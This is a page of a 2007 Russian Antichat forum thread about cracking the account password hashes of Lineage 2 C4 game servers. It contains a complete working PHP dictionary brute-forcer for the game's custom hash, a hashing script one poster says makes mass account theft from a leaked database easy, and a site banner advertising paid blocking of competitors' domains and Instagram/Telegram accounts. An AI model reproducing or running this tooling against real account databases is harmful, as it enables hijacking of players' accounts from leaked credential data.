Форум АНТИЧАТ - шифр аккаунтов la2 c4 pts

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
шифр аккаунтов la2 c4 pts

Страница 3 из 4

Опции темы

Поиск в этой теме

Опции просмотра

#21

09.07.2007, 00:11

vorishka

Постоянный

Регистрация: 03.03.2005

Сообщений: 351

Провел на форуме:
1120282

Репутация: 112

У меня была БД, там шифровка сводилась к Base64

#22

10.07.2007, 08:11

Светлый

Участник форума

Регистрация: 28.06.2007

Сообщений: 221

Провел на форуме:
836479

Репутация: 135

Написал алгоритм выуживания пассов и коллизий. За обменом в Пм

Basurman кстати прав.. первый попавшийся хеш дал 230 коллизий пароля.

Последний раз редактировалось Светлый; 10.07.2007 в 08:13..

#23

22.08.2007, 10:46

M0rgan

Новичок

Регистрация: 04.07.2007

Сообщений: 26

Провел на форуме:
134504

Репутация: 7

важаемый... это не расшифровщик а брутер (подборщик)
+платный... брут написать на пхп будет максимум 10 мин.
не думаю что люди получившие базу хешей будут юзать этот портал... оно платное ))
юзер получивший базу уже должен быть с мозгами...
так что хз хз но мое мнение боян, развод... и увы будет для лохов ( (не кому не в обиду, лохов в прямом смысле, не обзывательство)

#24

23.08.2007, 00:24

Светлый

Участник форума

Регистрация: 28.06.2007

Сообщений: 221

Провел на форуме:
836479

Репутация: 135

Цитата:

Сообщение от M0rgan

брут написать на пхп будет максимум 10 мин.

Интересно будет на это посмотреть

#25

23.08.2007, 02:07

[53x]Shadow

Leaders of Antichat

Регистрация: 25.01.2007

Сообщений: 341

Провел на форуме:
3372120

Репутация: 2565

Вот Вам брутер только не сорьтесь, писал сам(код брутера в конце) так, что особо не парился...=\

use:

Код:

http://www.test.com/la_brute.php?dict=полный_путь_до словаря.txt&hash=0xb1bd38c382153333069fb9b974eec8c8

PHP код:


		
			
<?php



// crap! {not mine}

    function la_encrypt($str) {

        $key = array();

        $dst = array();

        $i = 0;



        $nBytes = strlen($str);

                while ($i < $nBytes){

                 $i++;

                        $key[$i] = ord(substr($str, $i - 1, 1));

                        $dst[$i] = $key[$i];

        }



        $rslt = $key[1] + $key[2]*256 + $key[3]*65536 + $key[4]*16777216;

        $one = $rslt * 213119 + 2529077;

        $one = $one - intval($one/ 4294967296) * 4294967296;



        $rslt = $key[5] + $key[6]*256 + $key[7]*65536 + $key[8]*16777216;

        $two = $rslt * 213247 + 2529089;

        $two = $two - intval($two/ 4294967296) * 4294967296;



        $rslt = $key[9] + $key[10]*256 + $key[11]*65536 + $key[12]*16777216;

        $three = $rslt * 213203 + 2529589;

        $three = $three - intval($three/ 4294967296) * 4294967296;



        $rslt = $key[13] + $key[14]*256 + $key[15]*65536 + $key[16]*16777216;

        $four = $rslt * 213821 + 2529997;

        $four = $four - intval($four/ 4294967296) * 4294967296;



        $key[4] = intval($one/16777216);

        $key[3] = intval(($one - $key[4] * 16777216) / 65535);

        $key[2] = intval(($one - $key[4] * 16777216 - $key[3] * 65536) / 256);

        $key[1] = intval(($one - $key[4] * 16777216 - $key[3] * 65536 - $key[2] * 256));



        $key[8] = intval($two/16777216);

        $key[7] = intval(($two - $key[8] * 16777216) / 65535);

        $key[6] = intval(($two - $key[8] * 16777216 - $key[7] * 65536) / 256);

        $key[5] = intval(($two - $key[8] * 16777216 - $key[7] * 65536 - $key[6] * 256));



        $key[12] = intval($three/16777216);

        $key[11] = intval(($three - $key[12] * 16777216) / 65535);

        $key[10] = intval(($three - $key[12] * 16777216 - $key[11] * 65536) / 256);

        $key[9] = intval(($three - $key[12] * 16777216 - $key[11] * 65536 - $key[10] * 256));



        $key[16] = intval($four/16777216);

        $key[15] = intval(($four - $key[16] * 16777216) / 65535);

        $key[14] = intval(($four - $key[16] * 16777216 - $key[15] * 65536) / 256);

        $key[13] = intval(($four - $key[16] * 16777216 - $key[15] * 65536 - $key[14] * 256));



        $dst[1] = $dst[1] ^ $key[1];



        $i=1;

        while ($i<16){

                $i++;

                $dst[$i] = $dst[$i] ^ $dst[$i-1] ^ $key[$i];

        }



        $i=0;

        while ($i<16){

                $i++;

                if ($dst[$i] == 0) {

                        $dst[$i] = 102;

                }

        }



        $encrypt = "0x";

        $i=0;

        while ($i<16){

                $i++;

                if ($dst[$i] < 16) {

                        $encrypt = $encrypt . "0" . dechex($dst[$i]);

                } else {

                        $encrypt = $encrypt . dechex($dst[$i]);

                }

        }



        return $encrypt;

    }

//Сам брут

    $dict = $_GET['dict'];

    $hash = $_GET['hash'];

    $fd = fopen($dict,"r");

    while($pass = fgets($fd))

    {

        if($hash == la_encrypt(trim($pass)))

        {

            echo "Password is: ".$pass;

            exit();

        }

    }

    echo "Password not found!";

    fclose($fd);

?>

#26

23.08.2007, 02:28

mindw0rk

Познающий

Регистрация: 08.06.2007

Сообщений: 75

Провел на форуме:
517024

Репутация: 76

Отправить сообщение для mindw0rk с помощью ICQ

Хм, на одной фришке, помню, вообще шифрования небыло. Как vorishka и сказал, только base64.

#27

23.08.2007, 02:36

M0rgan

Новичок

Регистрация: 04.07.2007

Сообщений: 26

Провел на форуме:
134504

Репутация: 7

=удалил= =)

по поводу 10 секунд... сорци в инете обычного брута найти не тяжело... если есть мозги - подредактишь чуть чуть...
по поводу предупреждения... что же тогда будет? прошу все ответы и недовольствия писать в пм...

Шедоу спасибо за брут =)
может позже свой вариант выложу если найду )

Последний раз редактировалось M0rgan; 23.08.2007 в 18:55..

#28

23.08.2007, 06:51

Светлый

Участник форума

Регистрация: 28.06.2007

Сообщений: 221

Провел на форуме:
836479

Репутация: 135

По поводу хешей в Base64 - такие хеши используются в mysql ява серверов

PHP код:


		
			
    function CreateGamePass($password)

    {

       $gamepass = base64_encode(pack("H*", sha1(utf8_encode($password))));

        return $gamepass;

    }

По поводу брутера хешей ПТС- можно сделать так, чтобы он выдавал пароль или коллизию практически мгновенно, без словаря

Последний раз редактировалось Светлый; 23.08.2007 в 13:15..

#29

23.08.2007, 10:38

Shagon

Новичок

Регистрация: 22.07.2007

Сообщений: 5

Провел на форуме:
43348

Репутация: 0

Будет легче понять что за кодировка если знать пароль. Создай акк с пассом например 123 и пробуй декодировать его хеш по разным алгоритмам(с символами 0-9 сответствено). Я на джаве линейджевской так делал получил Sha-1(в PasswordPro есть).

Последний раз редактировалось Shagon; 23.08.2007 в 10:47..

#30

23.08.2007, 12:53

M0rgan

Новичок

Регистрация: 04.07.2007

Сообщений: 26

Провел на форуме:
134504

Репутация: 7

легче будет не регить акк а просто скриптом его акриптовать )
кстате так удобно массово угонять акки если есть целая база...
закриптовать например 123456 и в поиск =)

скрипт можно сделать чтото типа такого )

Код:

<?
require "la_encrypt.php";
$pass = $_GET['pass'];
$hash = la_encrypt($pass);
echo ($hash);
?>

Страница 3 из 4

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход